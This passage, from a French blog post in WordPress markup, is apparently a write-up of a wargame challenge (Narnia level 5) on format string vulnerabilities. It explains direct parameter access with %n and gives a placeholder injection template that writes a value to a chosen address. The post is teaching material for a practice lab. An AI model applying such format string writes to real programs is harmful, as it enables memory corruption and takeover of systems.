class=\"elementor-element elementor-element-ece348a elementor-widget elementor-widget-text-editor\" data-id=\"ece348a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Je me suis inspir\u00e9 de ce mod\u00e8le afin de construire mon injection, \u00e0 la diff\u00e9rence que j&#8217;ai utilis\u00e9 la m\u00e9thode &#8220;Direct Access Parameters&#8221;.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-877f026 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"877f026\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c780634\" data-id=\"c780634\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f6478b0 elementor-widget elementor-widget-heading\" data-id=\"f6478b0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-large\">M\u00e9thode : Direct Access Parameters<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-76a2bd7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"76a2bd7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-71aabb8\" data-id=\"71aabb8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c4330ab elementor-widget elementor-widget-text-editor\" data-id=\"c4330ab\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"font-size: 18px;line-height: 27px\">Selon le guide&nbsp;<a href=\"https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf\" style=\"font-size: 18px;font-weight: var( --e-global-typography-text-font-weight );font-family: var( --e-global-typography-text-font-family ), Sans-serif\">formatstring-1.2.pdf (stanford.edu)<\/a><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">, on peut utiliser une m\u00e9thode de &#8220;<\/span><i style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">stack popping<\/i><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">&#8221; qui permet d&#8217;adresser<\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text )\"><span style=\"font-size: 18px;font-weight: 700\">&nbsp;directement un param\u00e8tre de la pile<\/span><\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">&nbsp;(<\/span><i style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Direct Parameter Access<\/i><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">).<\/span><\/p><p style=\"font-size: 18px;line-height: 27px\"><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">Cela signifie placer&nbsp;<\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text )\"><span style=\"font-size: 18px;font-weight: 700\">directement un \u00e9l\u00e9ment<\/span><\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">&nbsp;sur la pile.<\/span><\/p><p style=\"font-size: 18px;line-height: 27px\"><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">Cet acc\u00e8s se fait par le qualificatif &#8216;$&#8217;.<\/span><\/p><p style=\"font-size: 18px;line-height: 27px\">En lisant le guide, on comprend que&nbsp;<code style=\"font-size: 18px\">%1$n<\/code>&nbsp;permet en fait d\u2019\u00e9crire \u00e0 un emplacement m\u00e9moire le dernier argument entr\u00e9.<\/p><p style=\"font-size: 18px;line-height: 27px\">En effet, le 1 indique le premier argument pass\u00e9 apr\u00e8s la chaine de format.<\/p><p style=\"font-size: 18px;line-height: 27px\">Le $n est l&#8217;\u00e9quivalent de %n. Il s&#8217;agit d&#8217;un sp\u00e9cifieur de format, utilis\u00e9 pour \u00e9crire l&#8217;argument pass\u00e9, \u00e0 l&#8217;adresse sp\u00e9cifi\u00e9e auparavant.&nbsp;<\/p><p style=\"font-size: 18px;line-height: 27px\">Nous avons aussi besoin d&#8217;un emplacement m\u00e9moire et d&#8217;une donn\u00e9e \u00e0 \u00e9crire sur la pile.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c66cc2e elementor-widget elementor-widget-image\" data-id=\"c66cc2e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"570\" height=\"301\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/06\/narna.5V2.png\" class=\"attachment-large size-large wp-image-877\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/06\/narna.5V2.png 570w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/06\/narna.5V2-300x158.png 300w\" sizes=\"(max-width: 570px) 100vw, 570px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7bee9ed elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7bee9ed\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5c86d6b\" data-id=\"5c86d6b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e3251de elementor-widget elementor-widget-text-editor\" data-id=\"e3251de\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"font-size: 18px;line-height: 27px\"><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Ainsi, on se retrouve avec une injection de ce format l\u00e0 :<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3af5aa4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3af5aa4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-11bf3d2\" data-id=\"11bf3d2\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f80d499 elementor-widget elementor-widget-code-highlight\" data-id=\"f80d499\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"adresse\")')%Nx%1\\$n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2551c89 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2551c89\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6875daf\" data-id=\"6875daf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-322d8d0 elementor-widget elementor-widget-text-editor\" data-id=\"322d8d0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>O\u00f9 N est un chiffre hexad\u00e9cimal (x) (l&#8217;argument) \u00e0 \u00e9crire \u00e0 l&#8217;adresse &#8220;<b><code>&lt;adresse&gt;\"<\/code><\/b><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-53e71cb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"53e71cb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4a0f865\" data-id=\"4a0f865\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4325920 elementor-widget elementor-widget-heading\" data-id=\"4325920\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Conclusion<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9570cf5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9570cf5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0d05780\" data-id=\"0d05780\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4ffd796 elementor-widget elementor-widget-text-editor\" data-id=\"4ffd796\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>J&#8217;ai trouv\u00e9 ce challenge tr\u00e8s int\u00e9ressant, il se penche sur un nouveau type de vuln\u00e9rabilit\u00e9s, encore jamais abord\u00e9 au cours de ce wargame.<\/p><p>Il existe de nombreuses fa\u00e7on diff\u00e9rentes de r\u00e9soudre ce challenge.<\/p><p>Il m&#8217;a sembl\u00e9 mystique au d\u00e9but, complexe \u00e0 prendre en main, mais gr\u00e2ce \u00e0 de nombreuses documentations et guides, il est possible d&#8217;en venir \u00e0 bout \ud83d\ude0a.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9bbc622 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9bbc622\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7282654\" data-id=\"7282654\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b8c98bd elementor-widget elementor-widget-heading\" data-id=\"b8c98bd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ressources<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-46c5085 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"46c5085\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4dcbc36\" data-id=\"4dcbc36\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f2b412a elementor-widget elementor-widget-text-editor\" data-id=\"f2b412a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><a href=\"https:\/\/owasp.org\/www-community\/attacks\/Format_string_attack\">Format string attack | OWASP Foundation<\/a><\/p><p><a href=\"https:\/\/medium.com\/@gurdeeps158\/exploit-format-string-vulnerability-in-printf-6740d9ff057e\">Exploit format String vulnerability in printf() | by GURDEEP SINGH | Medium<\/a><\/p><p><a href=\"https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf\">formatstring-1.2.pdf (stanford.edu)<\/a><\/p><p><a href=\"https:\/\/www.exploit-db.com\/docs\/english\/28476-linux-format-string-exploitation.pdf\">Format Strings Exploitation Tutorial (exploit-db.com)<\/a><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Nous sommes de retour avec le 6\u00e8me challenge de cette s\u00e9rie ! Celui-ci va nous permettre de d\u00e9couvrir de nouvelles vuln\u00e9rabilit\u00e9s, encore jamais vu dans les challenges Narnia : les formats strings ! D\u00e9couverte #include #include #include int main(int argc, char **argv){ int i = 1; char buffer[64]; snprintf(buffer, sizeof buffer, argv[1]); buffer[sizeof (buffer) -&hellip; <br \/> <a class=\"button small blue\" href=\"https:\/\/mindshield.eu\/index.php\/2023\/06\/01\/narnia5\/\">Read more<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[8,10,11],"class_list":["post-595","post","type-post","status-publish","format-standard","hentry","category-narnia_challenges","tag-challenge","tag-exploit","tag-formatstring"],"_links":{"self":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/595","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/comments?post=595"}],"version-history":[{"count":74,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/595\/revisions"}],"predecessor-version":[{"id":905,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/595\/revisions\/905"}],"wp:attachment":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/media?parent=595"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/categories?post=595"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/tags?post=595"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}